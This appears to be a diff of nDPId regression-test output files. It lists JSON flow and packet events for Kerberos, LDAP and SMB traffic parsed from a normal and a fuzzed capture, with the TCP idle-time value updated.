00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":477,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00704{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-data-len":24133,"total-not-detected-flows":2,"total-guessed-flows":23,"total-detected-flows":11,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":36,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":192,"global_ts_msec":1549337952283}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 77/77

8
test/results/kerberos_fuzz.pcapng.out
View File

@@ -1,9 +1,9 @@
00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1633884084000}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3}
00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":288,"pkt_l4_len":268,"thread_ts_msec":1633884084000,"pkt":"RSYBIAFKAAAABn0BfgQBABMAAAAAWNGOAAAAAAAAAQAgAQAAAAAAAGZfRk9VTgAGA0QNChsbGxsbGxsbGxsbJwYGBgYGBgYGBhsbG10bGwYGBgYGBgYGBg0K\/\/\/\/\/05NRWGMG2VyMUnz8\/NDQQEAAAAAAABdKgC3MFD\/AAAAAABfAAAAAAAAAEVhjGlkO\/\/\/\/\/\/\/b2VyWQAAAAAAAABNRQAAAAAAAAAAAAAAAAAAAAAATUxAU0m3MFCjL1MuMlQg80NBTk1FYYxpZDsNCv\/\/\/\/9OTUVhjBtlcjFJ8\/P\/\/\/\/\/AAAAAAAAXSoAtzBQoy9TLkFOTUVhjGlkOw0K\/\/\/\/\/zsNCv\/\/\/\/8vUy4yVEFUIPNDQU5NRWGMaWQ7DQr\/\/\/\/\/"}
00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}}
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3}
00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":288,"pkt_l4_len":268,"thread_ts_msec":1633884084000,"pkt":"RSYBIAFKAAAABn0BfgQBABMAAAAAWNGOAAAAAAAAAQAgAQAAAAAAAGZfRk9VTgAGA0QNChsbGxsbGxsbGxsbJwYGBgYGBgYGBhsbG10bGwYGBgYGBgYGBg0K\/\/\/\/\/05NRWGMG2VyMUnz8\/NDQQEAAAAAAABdKgC3MFD\/AAAAAABfAAAAAAAAAEVhjGlkO\/\/\/\/\/\/\/b2VyWQAAAAAAAABNRQAAAAAAAAAAAAAAAAAAAAAATUxAU0m3MFCjL1MuMlQg80NBTk1FYYxpZDsNCv\/\/\/\/9OTUVhjBtlcjFJ8\/P\/\/\/\/\/AAAAAAAAXSoAtzBQoy9TLkFOTUVhjGlkOw0K\/\/\/\/\/zsNCv\/\/\/\/8vUy4yVEFUIPNDQU5NRWGMaWQ7DQr\/\/\/\/\/"}
00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}}
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3}
